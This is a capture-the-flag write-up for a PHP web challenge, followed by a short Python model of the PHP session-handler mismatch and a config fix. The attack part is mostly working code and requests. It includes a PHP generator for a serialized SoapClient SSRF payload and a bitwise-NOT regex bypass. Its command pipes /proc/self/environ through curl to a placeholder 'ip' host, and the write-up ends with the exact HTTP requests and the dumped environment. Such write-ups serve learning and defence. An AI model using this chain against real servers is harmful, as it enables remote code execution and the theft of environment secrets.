sakura writeup
Sign-in
A single redirect; curl it and you're done.
web
ezphp
Use the callback function to override the session serialization handler to php_serialize; build a serialized SoapClient string that performs SSRF and get it written into the session file via serialization injection; then use the variable-overwrite vulnerability to overwrite variable b with the callback call_user_func. Combined with the callback invocation mentioned at the start, calling an undefined method on the SoapClient object triggers __call, which performs the SSRF request to flag.php.
Use bitwise NOT to bypass the regex filter and get RCE.
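The first step of the chain only works because the session data is written under one serialize_handler and read back under another. The following added example (mine, not from the writeup or the challenge) models both PHP session handlers in Python, with a benign stdClass payload instead of a gadget class, to show why the two handlers must never differ between the script that writes $_SESSION and the one that reads it. It assumes ASCII data, since PHP string lengths are byte counts.

```python
def unserialize(data, pos=0):
    """Parse one PHP-serialized value (i, s, a, O) at pos; return (value, next pos)."""
    t = data[pos]
    if t == 'i':                                    # i:42;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if t == 's':                                    # s:3:"abc";  length-delimited, so embedded quotes are fine
        colon = data.index(':', pos + 2)
        start, length = colon + 2, int(data[pos + 2:colon])
        return data[start:start + length], start + length + 2
    if t == 'O':                                    # O:8:"stdClass":1:{...}
        colon = data.index(':', pos + 2)
        cls = data[colon + 2:colon + 2 + int(data[pos + 2:colon])]
        props, pos = members(data, colon + 4 + len(cls))
        return ('object', cls, props), pos
    if t == 'a':                                    # a:1:{key;value;}
        return members(data, pos + 2)
    raise ValueError('unsupported type %r at %d' % (t, pos))

def members(data, pos):                             # n:{k;v;...} shared by arrays and objects
    colon = data.index(':', pos)
    count, pos, out = int(data[pos:colon]), colon + 2, {}
    for _ in range(count):
        key, pos = unserialize(data, pos)
        out[key], pos = unserialize(data, pos)
    return out, pos + 1                             # skip the closing '}'

def serialize(value):                               # int/str/dict -> PHP serialization (dict = PHP array)
    if isinstance(value, int):
        return 'i:%d;' % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value), value)
    return 'a:%d:{%s}' % (len(value), ''.join(serialize(k) + serialize(v) for k, v in value.items()))

def read_php_handler(blob):
    """serialize_handler=php (the default): 'key|value' records with no separator."""
    session, pos = {}, 0
    while (bar := blob.find('|', pos)) >= 0:        # PHP stops once no '|' remains
        session[blob[pos:bar]], pos = unserialize(blob, bar + 1)
    return session

def handler_mismatch_demo():
    """The same session data, read by both handlers. Constructed, benign payload: stdClass."""
    injected = '|O:8:"stdClass":1:{s:4:"note";s:6:"benign";}'
    stored = serialize({'name': injected})          # written under serialize_handler=php_serialize
    as_written = unserialize(stored)[0]['name']     # read under php_serialize: still a plain string
    crossed = read_php_handler(stored)              # read under php: '|' makes it a new record
    return as_written, next(iter(crossed.values()))
```

Pinning session.serialize_handler in php.ini (and never letting a request choose it) removes the mismatch; a string that is just data to one handler is an object construction to the other.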
<?php
// command whose output is posted to "ip" (placeholder for the receiving host)
$str = 'cat /proc/self/environ | curl -H "Content-Type: application/json" -X POST --data-binary @- ip';
$shell = urlencode(~$str);                       // bitwise NOT of every byte, to get past the regex filter
$url = "http://127.0.0.1/flag.php?i=(~%8C%86%8C%8B%9A%92)(~$shell);";   // (~"system")(~$str)
echo $url."\r\n\r\n";
$slen = strlen($url);
// leading '|' is the record delimiter of the php session handler
$a = '|O:10:"SoapClient":3:{s:3:"uri";s:'.$slen.':"'.$url.'";s:8:"location";s:'.$slen.':"'.$url.'";s:13:"_soap_version";i:1;}';
echo urlencode($a);
POST /index.php?f=session_start&name=<generated above> HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

serialize_handler=php_serialize
POST /index.php?f=extract&name=SoapClient HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

b=call_user_func
Dump the environment variables: cat /proc/self/environ
PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
USER=www-data
HOSTNAME=838bfba2cdd2
PHP_INI_DIR=/usr/local/etc/php
SHLVL=2
HOME=/home/www-data
PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2
PHP_MD5=
PHP_VERSION=7.0.33
GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2
PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirror
PHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirror
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c
PWD=/var/www/html
PHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96
FLAG=flag{ISEC-0e165f5593f2246bc53b395b7810c220}